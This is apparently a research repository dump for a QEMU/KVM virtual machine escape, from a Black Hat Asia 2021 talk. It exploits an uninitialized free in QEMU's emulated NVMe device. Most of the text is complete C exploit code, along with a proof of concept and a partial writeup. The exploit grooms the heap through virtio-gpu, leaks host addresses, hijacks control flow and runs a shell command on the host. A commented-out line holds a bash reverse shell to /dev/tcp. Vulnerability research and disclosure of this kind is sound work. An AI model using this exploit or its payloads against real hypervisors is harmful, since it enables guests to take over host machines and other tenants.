├── README.md ├── as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf ├── exploit ├── Makefile ├── common.c ├── common.h ├── exp └── exp.c ├── poc ├── Makefile ├── common.c ├── common.h └── poc.c └── writeup.md /README.md: -------------------------------------------------------------------------------- 1 | # scavenger 2 | 3 | This is an exploit for an uninitialized free in nvme:nvme_map_prp(). For more information, see the [writeup](https://github.com/hustdebug/scavenger/blob/main/writeup.md) the [slides](https://github.com/hustdebug/scavenger/blob/main/as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf) for the talk in Blackhat Asis 2021. 4 | 5 | ### Environment 6 | ``` 7 | $ ./qemu-system-x86_64 --version 8 | QEMU emulator version 4.2.1 (Debian 1:4.2-3ubuntu6.7) 9 | Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers 10 | ``` 11 | 12 | 13 | Command used to start QEMU 14 | ``` 15 | ./qemu-system-x86_64_exp -enable-kvm -boot c -m 4G -drive format=qcow2,file=./ubuntu.img \ 16 | -nic user,hostfwd=tcp:0.0.0.0:5555-:22 \ 17 | -drive file=./nvme.img,if=none,id=D11 -device nvme,drive=D11,serial=1234,cmb_size_mb=64 \ 18 | -device virtio-gpu -display none 19 | ``` 20 | 21 | ### Run 22 | 23 | Compile the exploit 24 | ``` 25 | make 26 | ``` 27 | Then 28 | ``` 29 | ./exp 30 | ``` 31 | -------------------------------------------------------------------------------- /as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hustdebug/scavenger/5779e36e85a8f6ec59f03e53b32513e277401882/as-21-Pan-Scavenger-Misuse-Error-Handling-Leading-To-QEMU-KVM-Escape.pdf -------------------------------------------------------------------------------- /exploit/Makefile: -------------------------------------------------------------------------------- 1 | ALL = exp 2 | CXX ?= g++ 3 | CXXFLAGS = -std=c++11 -g 4 | 5 | all: $(ALL) 6 | 7 | 8 | exp: exp.o common.o 9 | $(CXX) $(CXXFLAGS) -o $@ $^ 10 | 11 | %.o: %.cpp 12 | $(CXX) $(CXXFLAGS) -fPIC -c -o $@ $< 13 | 14 | 15 | .PHONY: clean 16 | clean: 17 | rm -rf *.o 18 | rm -rf $(ALL) 19 | 20 | 21 | -------------------------------------------------------------------------------- /exploit/common.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "common.h" 13 | 14 | void* mem_map( const char* dev, size_t offset, size_t size ) 15 | { 16 | int fd = open( dev, O_RDWR | O_SYNC ); 17 | if ( fd == -1 ) { 18 | return 0; 19 | } 20 | 21 | void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset ); 22 | 23 | if ( !result ) { 24 | return 0; 25 | } 26 | 27 | close( fd ); 28 | return result; 29 | } 30 | 31 | 32 | uint32_t page_offset(uint32_t addr) 33 | { 34 | return addr & ((1 << PAGE_SHIFT) - 1); 35 | } 36 | 37 | uint64_t gva_to_gfn(void *addr) 38 | { 39 | int fd = open("/proc/self/pagemap", O_RDONLY); 40 | if (fd < 0) { 41 | perror("open"); 42 | exit(1); 43 | } 44 | uint64_t pme, gfn; 45 | size_t offset; 46 | offset = ((uintptr_t)addr >> 9) & ~7; 47 | lseek(fd, offset, SEEK_SET); 48 | read(fd, &pme, 8); 49 | if (!(pme & PFN_PRESENT)) 50 | return -1; 51 | gfn = pme & PFN_PFN; 52 | return gfn; 53 | } 54 | 55 | uint64_t gva_to_gpa(void *addr) 56 | { 57 | uint64_t gfn = gva_to_gfn(addr); 58 | assert(gfn != -1); 59 | return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); 60 | } 61 | -------------------------------------------------------------------------------- /exploit/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define PAGE_SHIFT 12 4 | #define PAGE_SIZE (1 << PAGE_SHIFT) 5 | #define PFN_PRESENT (1ull << 63) 6 | #define PFN_PFN ((1ull << 55) - 1) 7 | #define PHY_RAM 0x80000000 8 | 9 | void* mem_map( const char* dev, size_t offset, size_t size ); 10 | uint32_t page_offset(uint32_t addr); 11 | uint64_t gva_to_gfn(void *addr); 12 | uint64_t gva_to_gpa(void *addr); 13 | -------------------------------------------------------------------------------- /exploit/exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hustdebug/scavenger/5779e36e85a8f6ec59f03e53b32513e277401882/exploit/exp -------------------------------------------------------------------------------- /exploit/exp.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | sudo /home/zjusvn/pwn/qemu-5.1.0/x86_64-softmmu/qemu-system-x86_64 \ 4 | -enable-kvm -boot c -m 4G -drive format=qcow2,file=./ubuntu.img \ 5 | -nic user,hostfwd=tcp:0.0.0.0:5555-:22 \ 6 | -drive file=./nvme.img,if=none,id=D11 -device nvme,drive=D11,serial=1234,cmb_size_mb=64 \ 7 | -device virtio-gpu -display none 8 | 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #include "common.h" 17 | 18 | #define CMD_NUMS 30 19 | #define CMD_SIZE 60 20 | 21 | uint32_t nvme_mmio_addr = 0xfebf0000; 22 | uint32_t nvme_mmio_size = 0x2000; 23 | 24 | uint32_t gpu_mmio_addr = 0xfd000000; 25 | uint32_t gpu_mmio_size = 0x4000; 26 | 27 | char *nvme_mmio_base; 28 | char *gpu_mmio_base; 29 | 30 | const char exec_cmd[] = ";gnome-calculator"; 31 | // const char exec_cmd[] = ";/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/3333 0>&1'"; 32 | // #define printf // 33 | 34 | uint64_t system_offset = 0x2cf170; 35 | uint64_t nvme_process_sq_offset = 0x5A7D00; 36 | uint64_t cleanup_offset = 0x708390; 37 | 38 | 39 | typedef struct NvmeCmd { 40 | uint8_t opcode; 41 | uint8_t fuse; 42 | uint16_t cid; 43 | uint32_t nsid; 44 | uint64_t res1; 45 | uint64_t mptr; 46 | uint64_t prp1; 47 | uint64_t prp2; 48 | uint32_t cdw10; 49 | uint32_t cdw11; 50 | uint32_t cdw12; 51 | uint32_t cdw13; 52 | uint32_t cdw14; 53 | uint32_t cdw15; 54 | } NvmeCmd; 55 | 56 | typedef struct NvmeCqe { 57 | uint32_t result; 58 | uint32_t rsvd; 59 | uint16_t sq_head; 60 | uint16_t sq_id; 61 | uint16_t cid; 62 | uint16_t status; 63 | } NvmeCqe; 64 | 65 | NvmeCmd *cmds[CMD_NUMS]; 66 | NvmeCqe cqe; 67 | uint32_t admin_tail = 0; 68 | 69 | 70 | #define VRING_DESC_F_NEXT 1 71 | #define VRING_DESC_F_WRITE 2 72 | 73 | #define VIRTIO_PCI_COMMON_STATUS 20 74 | #define VIRTIO_PCI_COMMON_Q_SELECT 22 75 | #define VIRTIO_PCI_COMMON_Q_SIZE 24 76 | #define VIRTIO_PCI_COMMON_Q_ENABLE 28 77 | #define VIRTIO_PCI_COMMON_Q_DESCLO 32 78 | #define VIRTIO_PCI_COMMON_Q_DESCHI 36 79 | #define VIRTIO_PCI_COMMON_Q_AVAILLO 40 80 | #define VIRTIO_PCI_COMMON_Q_AVAILHI 44 81 | 82 | #define VIRTIO_GPU_CMD_RESOURCE_CREATE_2D 0x101 83 | #define VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING 0x106 84 | 85 | typedef struct VRingDesc 86 | { 87 | uint64_t addr; 88 | uint32_t len; 89 | uint16_t flags; 90 | uint16_t next; 91 | }VRingDesc; 92 | 93 | typedef struct VRingAvail 94 | { 95 | uint16_t flags; 96 | uint16_t idx; 97 | uint16_t ring[]; 98 | }VRingAvail; 99 | 100 | struct virtio_gpu_ctrl_hdr { 101 | uint32_t type; 102 | uint32_t flags; 103 | uint64_t fence_id; 104 | uint32_t ctx_id; 105 | uint32_t padding; 106 | }; 107 | 108 | typedef struct Virtio_gpu_resource_attach_backing { 109 | struct virtio_gpu_ctrl_hdr hdr; 110 | uint32_t resource_id; 111 | uint32_t nr_entries; 112 | }Virtio_gpu_resource_attach_backing; 113 | 114 | 115 | typedef struct Virtio_gpu_resource_create_2d { 116 | struct virtio_gpu_ctrl_hdr hdr; 117 | uint32_t resource_id; 118 | uint32_t format; 119 | uint32_t width; 120 | uint32_t height; 121 | }Virtio_gpu_resource_create_2d; 122 | 123 | typedef struct Virtio_gpu_mem_entry { 124 | uint64_t addr; 125 | uint32_t length; 126 | uint32_t padding; 127 | }Virtio_gpu_mem_entry; 128 | 129 | VRingDesc *desc; 130 | VRingAvail *avail; 131 | Virtio_gpu_mem_entry *ent; 132 | char *gpu_cmd; 133 | 134 | void gpu_wr32(uint32_t addr, uint32_t value) { 135 | *((uint32_t*)(gpu_mmio_base + addr)) = value; 136 | } 137 | 138 | void init_gpu(void) { 139 | desc = (VRingDesc *)aligned_alloc(0x1000, 100 * sizeof(VRingDesc)); 140 | avail = (VRingAvail *)aligned_alloc(0x1000, 100 * sizeof(VRingAvail)); 141 | printf("[+] DESC VIR ADDR = 0x%lx, PHY ADDR = 0x%lx\n", (uint64_t)desc, gva_to_gpa(desc)); 142 | printf("[+] Avail VIR ADDR = 0x%lx, PHY ADDR = 0x%lx\n", (uint64_t)avail, gva_to_gpa(avail)); 143 | 144 | gpu_wr32(VIRTIO_PCI_COMMON_STATUS, 0); // reset virtio 145 | gpu_wr32(VIRTIO_PCI_COMMON_Q_SELECT, 0); // sel number 146 | gpu_wr32(VIRTIO_PCI_COMMON_Q_SIZE, 640); // vq->vring.num 147 | gpu_wr32(VIRTIO_PCI_COMMON_Q_DESCLO, gva_to_gpa(desc)); // desc phy addr 148 | gpu_wr32(VIRTIO_PCI_COMMON_Q_DESCHI, gva_to_gpa(desc) >> 32); 149 | gpu_wr32(VIRTIO_PCI_COMMON_Q_AVAILLO, gva_to_gpa(avail)); // avail phy addr 150 | gpu_wr32(VIRTIO_PCI_COMMON_Q_AVAILHI, gva_to_gpa(avail) >> 32); 151 | gpu_wr32(VIRTIO_PCI_COMMON_Q_ENABLE, 1); // enable 152 | 153 | } 154 | 155 | void heap_layout1(void) { 156 | 157 | Virtio_gpu_resource_create_2d *c2d = (Virtio_gpu_resource_create_2d*)malloc(sizeof(Virtio_gpu_resource_create_2d)); 158 | c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D; 159 | c2d->resource_id = 2; 160 | c2d->format = 1; 161 | c2d->width = 0x100; 162 | c2d->height = 0x100; 163 | 164 | Virtio_gpu_resource_attach_backing *ab = (Virtio_gpu_resource_attach_backing*)malloc(sizeof(Virtio_gpu_resource_attach_backing)); 165 | ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING; 166 | ab->resource_id = 2; 167 | ab->nr_entries = 20; // alloc 0x150 chunk 168 | 169 | ent = (Virtio_gpu_mem_entry*)malloc(0x280); // 0x280, 0x30 for timer 170 | memset(ent, 'A', sizeof(Virtio_gpu_mem_entry) * 3); 171 | ent->addr = gva_to_gpa(ent); 172 | ent->length = sizeof(Virtio_gpu_mem_entry); 173 | 174 | Virtio_gpu_mem_entry *bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 175 | bounce_ent->addr = 0x77ffff0000; // Let dma_memory_map fail, in order to set qsg->dev as zero. 176 | bounce_ent->length = 0x280; // Then bypass the object_unref in qemu_sglist_destroy. And free the mapping table. 177 | 178 | Virtio_gpu_mem_entry *next_bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 179 | next_bounce_ent->addr = 0x77ffff0000; 180 | next_bounce_ent->length = 0; 181 | 182 | desc[0].addr = gva_to_gpa(c2d); 183 | desc[0].len = sizeof(Virtio_gpu_resource_create_2d); 184 | desc[0].flags = 0; 185 | desc[0].next = 1; 186 | 187 | desc[20].addr = gva_to_gpa(ab); 188 | desc[20].len = sizeof(Virtio_gpu_resource_attach_backing); 189 | desc[20].flags = VRING_DESC_F_NEXT; 190 | desc[20].next = 21; 191 | 192 | for(int i=21; i<59; i++) { // for padding 193 | desc[i].addr = gva_to_gpa(ent); 194 | desc[i].len = sizeof(Virtio_gpu_mem_entry); 195 | desc[i].flags = VRING_DESC_F_NEXT; 196 | desc[i].next = i+1; 197 | } 198 | 199 | // desc[25].addr = gva_to_gpa(bounce_ent); // alloc bounce buffer 200 | desc[24].addr = gva_to_gpa(bounce_ent); 201 | desc[26].addr = gva_to_gpa(next_bounce_ent); 202 | 203 | desc[59].addr = gva_to_gpa(ent); // alloc bounce buffer 204 | desc[59].len = sizeof(Virtio_gpu_mem_entry); 205 | desc[59].flags = 0; 206 | desc[59].next = 2; 207 | 208 | avail[0].idx = 2; 209 | avail->ring[0] = 0; 210 | avail->ring[1] = 20; 211 | 212 | gpu_wr32(0x3000, 1); // notify 213 | 214 | } 215 | 216 | void heap_layout2(void) { 217 | 218 | Virtio_gpu_resource_create_2d *c2d = (Virtio_gpu_resource_create_2d*)malloc(sizeof(Virtio_gpu_resource_create_2d)); 219 | c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D; 220 | c2d->resource_id = 3; 221 | c2d->format = 1; 222 | c2d->width = 0x100; 223 | c2d->height = 0x100; 224 | 225 | gpu_cmd = malloc(0x200); 226 | memcpy(gpu_cmd+0x20, exec_cmd, strlen(exec_cmd)); 227 | 228 | for(int i=0; i<21; i++) { // for padding 229 | desc[i].addr = gva_to_gpa(gpu_cmd); 230 | desc[i].len = sizeof(Virtio_gpu_mem_entry); 231 | desc[i].flags = VRING_DESC_F_NEXT; 232 | desc[i].next = i+1; 233 | } 234 | 235 | desc[21].addr = gva_to_gpa(gpu_cmd); 236 | desc[21].len = sizeof(Virtio_gpu_mem_entry); 237 | desc[21].flags = 0; 238 | desc[21].next = 2; 239 | 240 | avail[0].idx = 3; 241 | avail->ring[2] = 0; 242 | 243 | gpu_wr32(0x3000, 1); // notify 244 | 245 | } 246 | 247 | void heap_layout3(void) { 248 | 249 | Virtio_gpu_resource_create_2d *c2d = (Virtio_gpu_resource_create_2d*)malloc(sizeof(Virtio_gpu_resource_create_2d)); 250 | c2d->hdr.type = VIRTIO_GPU_CMD_RESOURCE_CREATE_2D; 251 | c2d->resource_id = 4; 252 | c2d->format = 1; 253 | c2d->width = 0x100; 254 | c2d->height = 0x100; 255 | 256 | Virtio_gpu_resource_attach_backing *ab = (Virtio_gpu_resource_attach_backing*)malloc(sizeof(Virtio_gpu_resource_attach_backing)); 257 | ab->hdr.type = VIRTIO_GPU_CMD_RESOURCE_DETACH_BACKING; 258 | ab->resource_id = 4; 259 | ab->nr_entries = 20; 260 | 261 | ent = (Virtio_gpu_mem_entry*)malloc(0x30); // 0x280, 0x30 for timer 262 | memset(ent, 'A', sizeof(Virtio_gpu_mem_entry) * 3); 263 | ent->addr = gva_to_gpa(ent); 264 | ent->length = sizeof(Virtio_gpu_mem_entry); 265 | 266 | Virtio_gpu_mem_entry *bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 267 | bounce_ent->addr = 0x77ffff0000; 268 | bounce_ent->length = 0x280; 269 | 270 | Virtio_gpu_mem_entry *next_bounce_ent = (Virtio_gpu_mem_entry*)malloc(sizeof(Virtio_gpu_mem_entry)); 271 | next_bounce_ent->addr = 0x77ffff0000; 272 | next_bounce_ent->length = 0; 273 | 274 | desc[0].addr = gva_to_gpa(c2d); 275 | desc[0].len = sizeof(Virtio_gpu_resource_create_2d); 276 | desc[0].flags = 0; 277 | desc[0].next = 1; 278 | 279 | desc[20].addr = gva_to_gpa(ab); 280 | desc[20].len = sizeof(Virtio_gpu_resource_attach_backing); 281 | desc[20].flags = VRING_DESC_F_NEXT; 282 | desc[20].next = 21; 283 | 284 | for(int i=21; i<59; i++) { // for padding 285 | desc[i].addr = gva_to_gpa(ent); 286 | desc[i].len = sizeof(Virtio_gpu_mem_entry); 287 | desc[i].flags = VRING_DESC_F_NEXT; 288 | desc[i].next = i+1; 289 | } 290 | 291 | desc[24].addr = gva_to_gpa(bounce_ent); 292 | desc[26].addr = gva_to_gpa(next_bounce_ent); 293 | 294 | desc[59].addr = gva_to_gpa(ent); // alloc bounce buffer 295 | desc[59].len = sizeof(Virtio_gpu_mem_entry); 296 | desc[59].flags = 0; 297 | desc[59].next = 2; 298 | 299 | avail[0].idx = 5; 300 | avail->ring[3] = 0; 301 | avail->ring[4] = 20; 302 | 303 | gpu_wr32(0x3000, 1); // notify 304 | 305 | } 306 | 307 | void nvme_wr32(uint32_t addr, uint32_t value) 308 | { 309 | *((uint32_t*)(nvme_mmio_base + addr)) = value; 310 | sleep(0.1); 311 | } 312 | 313 | uint32_t nvme_rd32(uint32_t addr) 314 | { 315 | return *((uint32_t*)(nvme_mmio_base + addr)); 316 | } 317 | 318 | void init_nvme(void) { 319 | nvme_wr32(0x14, 0); // nvme_clear_ctrl 320 | nvme_wr32(0x24, 0xff00ff); // n->bar.aqa 321 | nvme_wr32(0x28, gva_to_gpa(cmds[0])); 322 | nvme_wr32(0x2c, gva_to_gpa(cmds[0]) >> 32); 323 | 324 | uint32_t data = 1; 325 | data |= 6 << 16; // sqes 326 | data |= 4 << 20; // cqes 327 | nvme_wr32(0x14, data); // nvme_start_ctrl 328 | } 329 | 330 | uint32_t inc_tail(void) { 331 | int cur = admin_tail; 332 | admin_tail = (admin_tail + 1) % CMD_SIZE; 333 | return cur; 334 | } 335 | 336 | NvmeCmd create_cq(uint32_t prp1, uint32_t cqid, uint32_t qsize) { 337 | NvmeCmd cmd; 338 | cmd.opcode = 5; 339 | cmd.prp1 = prp1; 340 | cmd.cdw10 = cqid; 341 | cmd.cdw10 |= qsize << 16; 342 | cmd.cdw11 = 1; // cq_flags 343 | cmd.cdw11 |= 0 << 16; // irq_vector 344 | return cmd; 345 | } 346 | 347 | void create_cqlist(void) { 348 | NvmeCmd *cmd = cmds[0]; 349 | int i; 350 | for(i=0; i<25; i++) { 351 | cmd[inc_tail()] = create_cq(gva_to_gpa(&cqe), i + 1, 64); 352 | } 353 | nvme_wr32(0x1000, admin_tail); 354 | } 355 | 356 | NvmeCmd create_sq(uint64_t prp1, uint32_t sqid, uint32_t qsize, uint32_t cqid) { 357 | NvmeCmd cmd; 358 | cmd.opcode = 1; 359 | cmd.prp1 = prp1; 360 | cmd.cdw10 = sqid; 361 | cmd.cdw10 |= qsize << 16; 362 | cmd.cdw11 = 1; // sq_flags 363 | cmd.cdw11 |= cqid << 16; 364 | return cmd; 365 | } 366 | 367 | NvmeCmd del_sq(uint32_t qid) { 368 | NvmeCmd cmd; 369 | cmd.opcode = 0; 370 | cmd.cdw10 = qid; 371 | return cmd; 372 | } 373 | 374 | void vuln(uint64_t sqid) { 375 | NvmeCmd *cmd = cmds[sqid]; 376 | 377 | cmd[0].nsid = 1; 378 | cmd[0].opcode = 2; // NVME_CMD_READ 379 | cmd[0].prp1 = 0xf8000000 + 0x500; 380 | cmd[0].prp2 = 0; 381 | cmd[0].cdw10 = 5; // slba 382 | cmd[0].cdw11 = 0; 383 | cmd[0].cdw12 = 8; // nlb 384 | 385 | nvme_wr32(0x1000 + sqid*8, 1); 386 | } 387 | 388 | int main(int argc, char *argv[]){ 389 | 390 | 391 | nvme_mmio_base = mem_map( "/dev/mem", nvme_mmio_addr, nvme_mmio_size ); 392 | if ( !nvme_mmio_base ) { 393 | return 0; 394 | } 395 | 396 | gpu_mmio_base = mem_map( "/dev/mem", gpu_mmio_addr, gpu_mmio_size ); 397 | if ( !gpu_mmio_base ) { 398 | return 0; 399 | } 400 | 401 | for(int i=0; i USERSPACE 0x290 CHUNK\n"); 425 | // getchar(); 426 | 427 | /* free chunk 0x150->0x290 , use sqid = 1 */ 428 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[1]), 1, 1, 1); 429 | nvme_wr32(0x1000, admin_tail); 430 | vuln(1); 431 | //printf("[D] NVME FREE 0x290 CHUNK OK!\n"); 432 | // getchar(); 433 | 434 | /* malloc map table */ 435 | heap_layout2(); 436 | //printf("[D] VIRTIO GPU PLACE MAP TABLE TO LEAK PHYSMAP ADDR!\n"); 437 | // getchar(); 438 | sleep(1); 439 | 440 | uint64_t *leak = (uint64_t *)ent; 441 | uint64_t physmap_addr = leak[36]; 442 | *(uint64_t *)(gpu_cmd) = physmap_addr+0x20; 443 | printf("[D] physmap_addr addr = 0x%lx\n", physmap_addr); 444 | // getchar(); 445 | 446 | /* del chunk 0x150 to fill up 0x150 freelist 447 | heap spray 0x290 chunk to clear 0x290 freelist */ 448 | cmd[inc_tail()] = del_sq(1); 449 | for(int i=20; i<25; i++) 450 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[i]), i, 3, i); 451 | nvme_wr32(0x1000, admin_tail); 452 | //printf("[D] NVME CLEAR FREELIST OK!\n"); 453 | // getchar(); 454 | 455 | /* construct second unintialized chunk */ 456 | heap_layout3(); 457 | //printf("[D] VIRTIO GPU HEAP LAYOUT OK! 0x150 TABLE -> USERSPACE 0x40 CHUNK\n"); 458 | // getchar(); 459 | 460 | /* free chunk 0x150->0x40 , use sqid = 2 */ 461 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[2]), 2, 1, 2); 462 | nvme_wr32(0x1000, admin_tail); 463 | vuln(2); 464 | //printf("[D] NVME FREE 0x40 CHUNK OK!\n"); 465 | // getchar(); 466 | 467 | /* new timer , use sqid = 3 */ 468 | cmd[inc_tail()] = create_sq(gva_to_gpa(cmds[3]), 3, 1, 3); 469 | nvme_wr32(0x1000, admin_tail); 470 | //printf("[D] NVME NEW TIMER OK!\n"); 471 | // getchar(); 472 | 473 | 474 | /* leak qemu_base & heap_base */ 475 | leak = (uint64_t *)ent; 476 | uint64_t qemu_base = leak[2] - nvme_process_sq_offset; 477 | uint64_t system = qemu_base + system_offset; 478 | // getchar(); 479 | printf(" _ _ _ _ _ _\n\ 480 | | (_) __ _| |__ | |_ _ _ ___ __ _ _ __ | | __ _| |__\n\ 481 | | | |/ _` | '_ \\| __| | | | |/ _ \\/ _` | '__| | |/ _` | '_ \\\n\ 482 | | | | (_| | | | | |_ | |_| | __/ (_| | | | | (_| | |_) |\n\ 483 | |_|_|\\__, |_| |_|\\__| \\__, |\\___|\\__,_|_| |_|\\__,_|_.__/\n\ 484 | |___/ |___/\n\n"); 485 | 486 | printf("[D] Qemu base = 0x%lx\n", qemu_base); 487 | printf("[D] System addr = 0x%lx\n", system); 488 | 489 | // getchar(); 490 | 491 | /* control RIP */ 492 | leak[3] = physmap_addr; 493 | leak[2] = qemu_base + cleanup_offset; 494 | 495 | 496 | printf("[D] Control RIP Sucessful! \n"); 497 | 498 | // fflush(stdout); 499 | sleep(1); 500 | /* trigger system command */ 501 | nvme_wr32(0x1000 + 8*3, 1); 502 | 503 | } 504 | 505 | -------------------------------------------------------------------------------- /poc/Makefile: -------------------------------------------------------------------------------- 1 | ALL = poc 2 | CXX ?= g++ 3 | CXXFLAGS = -std=c++11 -g 4 | 5 | all: $(ALL) 6 | 7 | 8 | poc: poc.o common.o 9 | $(CXX) $(CXXFLAGS) -o $@ $^ 10 | 11 | %.o: %.cpp 12 | $(CXX) $(CXXFLAGS) -fPIC -c -o $@ $< 13 | 14 | 15 | .PHONY: clean 16 | clean: 17 | rm -rf *.o 18 | rm -rf $(ALL) 19 | 20 | 21 | -------------------------------------------------------------------------------- /poc/common.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include "common.h" 13 | 14 | void* mem_map( const char* dev, size_t offset, size_t size ) 15 | { 16 | int fd = open( dev, O_RDWR | O_SYNC ); 17 | if ( fd == -1 ) { 18 | return 0; 19 | } 20 | 21 | void* result = mmap( NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, offset ); 22 | 23 | if ( !result ) { 24 | return 0; 25 | } 26 | 27 | close( fd ); 28 | return result; 29 | } 30 | 31 | 32 | uint32_t page_offset(uint32_t addr) 33 | { 34 | return addr & ((1 << PAGE_SHIFT) - 1); 35 | } 36 | 37 | uint64_t gva_to_gfn(void *addr) 38 | { 39 | int fd = open("/proc/self/pagemap", O_RDONLY); 40 | if (fd < 0) { 41 | perror("open"); 42 | exit(1); 43 | } 44 | uint64_t pme, gfn; 45 | size_t offset; 46 | offset = ((uintptr_t)addr >> 9) & ~7; 47 | lseek(fd, offset, SEEK_SET); 48 | read(fd, &pme, 8); 49 | if (!(pme & PFN_PRESENT)) 50 | return -1; 51 | gfn = pme & PFN_PFN; 52 | return gfn; 53 | } 54 | 55 | uint64_t gva_to_gpa(void *addr) 56 | { 57 | uint64_t gfn = gva_to_gfn(addr); 58 | assert(gfn != -1); 59 | return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); 60 | } 61 | -------------------------------------------------------------------------------- /poc/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define PAGE_SHIFT 12 4 | #define PAGE_SIZE (1 << PAGE_SHIFT) 5 | #define PFN_PRESENT (1ull << 63) 6 | #define PFN_PFN ((1ull << 55) - 1) 7 | #define PHY_RAM 0x80000000 8 | 9 | void* mem_map( const char* dev, size_t offset, size_t size ); 10 | uint32_t page_offset(uint32_t addr); 11 | uint64_t gva_to_gfn(void *addr); 12 | uint64_t gva_to_gpa(void *addr); 13 | -------------------------------------------------------------------------------- /poc/poc.c: -------------------------------------------------------------------------------- 1 | /* 2 | Boot command : 3 | -drive file=./nvme.img,if=none,id=D22 -device nvme,drive=D22,serial=1234,cmb_size_mb=64 4 | */ 5 | 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include "common.h" 13 | 14 | 15 | uint32_t mmio_addr = 0xfebd0000; 16 | uint32_t mmio_size = 0x2000; 17 | 18 | char *mmio_base; 19 | 20 | typedef struct NvmeCmd { 21 | uint8_t opcode; 22 | uint8_t fuse; 23 | uint16_t cid; 24 | uint32_t nsid; 25 | uint64_t res1; 26 | uint64_t mptr; 27 | uint64_t prp1; 28 | uint64_t prp2; 29 | uint32_t cdw10; 30 | uint32_t cdw11; 31 | uint32_t cdw12; 32 | uint32_t cdw13; 33 | uint32_t cdw14; 34 | uint32_t cdw15; 35 | } NvmeCmd; 36 | 37 | NvmeCmd *cmds; 38 | 39 | void nvme_wr32(uint32_t addr, uint32_t value) 40 | { 41 | *((uint32_t*)(mmio_base + addr)) = value; 42 | } 43 | 44 | uint32_t nvme_rd32(uint32_t addr) 45 | { 46 | return *((uint32_t*)(mmio_base + addr)); 47 | } 48 | 49 | void exploit() { 50 | nvme_wr32(0x14, 0); // nvme_clear_ctrl 51 | 52 | nvme_wr32(0x28, gva_to_gpa(cmds)); 53 | nvme_wr32(0x2c, gva_to_gpa(cmds) >> 32); 54 | 55 | uint32_t data = 1; 56 | data |= 6 << 16; // sqes 57 | data |= 4 << 20; // cqes 58 | nvme_wr32(0x14, data); // nvme_start_ctrl 59 | 60 | NvmeCmd *cmd = &cmds[0]; 61 | cmd->opcode = 6; // NVME_ADM_CMD_IDENTIFY 62 | cmd->cdw10 = 1; // NVME_ID_CNS_CTRL 63 | cmd->prp1 = 0xf8000000 + 0x500; 64 | cmd->prp2 = 0xf8000000 + 0x4000000; // 0 65 | 66 | 67 | nvme_wr32(0x1000, 1); 68 | } 69 | 70 | int main(int argc, char *argv[]){ 71 | mmio_base = mem_map( "/dev/mem", mmio_addr, mmio_size ); 72 | if ( !mmio_base ) { 73 | return 0; 74 | } 75 | 76 | cmds = (NvmeCmd *)aligned_alloc(0x1000, 20 * sizeof(NvmeCmd)); 77 | memset(cmds, 0xb, sizeof(cmds)); 78 | printf("mmio_base = 0x%lx\n", (long)mmio_base); 79 | printf("cmd phy addr = 0x%lx\n", (long)gva_to_gpa(cmds)); 80 | exploit(); 81 | } 82 | 83 | -------------------------------------------------------------------------------- /writeup.md: -------------------------------------------------------------------------------- 1 | ### 0x01 Vulnerable Code 2 | 3 | ```c 4 | // hw/block/nvme.c 5 | static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1, 6 | uint64_t prp2, uint32_t len, NvmeCtrl *n) 7 | { 8 | hwaddr trans_len = n->page_size - (prp1 % n->page_size); 9 | trans_len = MIN(len, trans_len); 10 | int num_prps = (len >> n->page_bits) + 1; 11 | 12 | if (unlikely(!prp1)) { 13 | trace_pci_nvme_err_invalid_prp(); 14 | return NVME_INVALID_FIELD | NVME_DNR; 15 | } else if (n->bar.cmbsz && prp1 >= n->ctrl_mem.addr && 16 | prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) { 17 | qsg->nsg = 0; 18 | qemu_iovec_init(iov, num_prps); 19 | qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], trans_len); 20 | } else { 21 | pci_dma_sglist_init(qsg, &n->parent_obj, num_prps); 22 | qemu_sglist_add(qsg, prp1, trans_len); 23 | } 24 | ··· 25 | unmap: 26 | qemu_sglist_destroy(qsg); 27 | return NVME_INVALID_FIELD | NVME_DNR; 28 | } 29 | ``` 30 | 31 | The function **nvme_map_prp()** here means mapping a block of memory. And there are two ways for user to map memory, through **qemu_iovec_init()** or **pci_dma_sglist_init()**. The function jumps to **unmap** statement when handling errors, then the program will directly call **qemu_sglist_destroy()** without consideration how the memory was mapped, resulting in an uninitialized free. 32 | 33 | ### 0x02 Turn arbitrary free to UAF 34 | 35 | ​ There are two kinds of memory space in Qemu's process, Qemu's heap and physmap heap. 36 | 37 | 1. Heap spray to clear tcache freelist 38 | 2. Malloc a mapping 